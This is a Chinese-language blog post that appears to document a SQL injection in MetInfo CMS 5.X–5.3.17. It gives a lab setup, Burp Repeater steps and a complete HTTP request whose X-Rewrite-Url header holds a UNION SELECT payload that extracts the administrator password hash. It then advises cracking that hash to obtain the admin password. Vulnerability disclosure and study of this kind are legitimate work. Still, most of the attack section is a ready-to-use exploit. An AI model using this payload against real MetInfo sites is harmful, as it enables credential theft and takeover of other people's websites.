MetInfo SQL注入漏洞

  • A+
所属分类:sql注入 关注cms

MetInfo

MetInfo是一套开源的建站CMS,是使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。

 

漏洞简介及危害

MetInfo于8月1日发布了5.3.18的升级公告,此次修复了5.X到5.3.17版本的SQL注入漏洞,影响范围广泛。

成功访问后恶意访问者可以获取到管理员账号还有hash值

 

影响版本

MetInfo 5.X - 5.3.17

 

漏洞证明

0x00 环境搭建

地址:

首页地址:http://172.19.18.8/MetInfo-5.3.17/

后台地址:http://172.19.18.8/MetInfo-5.3.17/admin

漏洞前提:伪静态化需为开启状态

MetInfo SQL注入漏洞

 

0x01漏洞证

http://172.16.12.2/metinfo/index.php?lang=Cn&index=0000进行抓包,会自动跳转至

/metinfo/list-Cn.html (如果没有自动跳转,点击Forward按钮即可)我们把抓到的包点击右键,发送到重放。Repeater

MetInfo SQL注入漏洞 

修改数据包,

X-Rewrite-Url处添加我们构造好的SQL语句。

 

 

GET /MetInfo-5.3.17/index.php?lang=Cn&index=0000 HTTP/1.1

Host: 172.19.18.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: */*

Accept-Language: en

X-Rewrite-Url: 1/2/404xxx' union select 1,2,3,admin_pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from met_5_3_17admin_table limit 1#/index.php

Connection: close

Upgrade-Insecure-Requests: 1

 

 

 MetInfo SQL注入漏洞

 

 

我们点击Go按钮进行重放访问,可以看到页面中返回了我们查询的管理员的hash值。直接可以使用cmd5解密获取admin密码。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: